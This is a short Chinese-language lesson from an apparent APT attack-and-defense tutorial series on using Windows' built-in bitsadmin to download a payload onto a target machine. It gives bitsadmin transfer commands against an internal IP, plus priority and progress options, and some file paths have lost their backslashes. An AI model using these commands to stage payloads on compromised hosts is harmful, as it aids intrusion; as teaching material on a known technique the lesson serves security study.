第四十一課:bitsadmin一句話下載payload
專注APT攻擊與防御
https://micropoor.blogspot.com/
微軟官方做出如下解釋:
BITSAdmin是一個(gè)命令行工具,可用于創(chuàng)建下載或上傳并監(jiān)視其進(jìn)度。
具體相關(guān)參數(shù)參見官方文檔:
https://docs.microsoft.com/zh-cn/windows/desktop/Bits/bitsadmin-tool
自windows7 以上版本內(nèi)置bitsadmin,它可以在網(wǎng)絡(luò)不穩(wěn)定的狀態(tài)下下載文件,出錯(cuò)會(huì)自動(dòng)重試,在比較復(fù)雜的網(wǎng)絡(luò)環(huán)境下,有著不錯(cuò)的性能。
靶機(jī):windows 7
E:>bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt"
E:PDFrobots.txt
需要注意的是,bitsadmin要求服務(wù)器支持Range標(biāo)頭。
如果需要下載過大的文件,需要提高優(yōu)先級(jí)。配合上面的下載命令。再次執(zhí)行
bitsadmin /setpriority down foreground
如果下載文件在1-5M之間,需要時(shí)時(shí)查看進(jìn)度。同樣它也支持進(jìn)度條。
bitsadmin /transfer down /download /priority normal
"http://192.168.1.115/robots.txt" E:PDFrobots.txt
后者的話:不支持https協(xié)議。
Micropoor
?
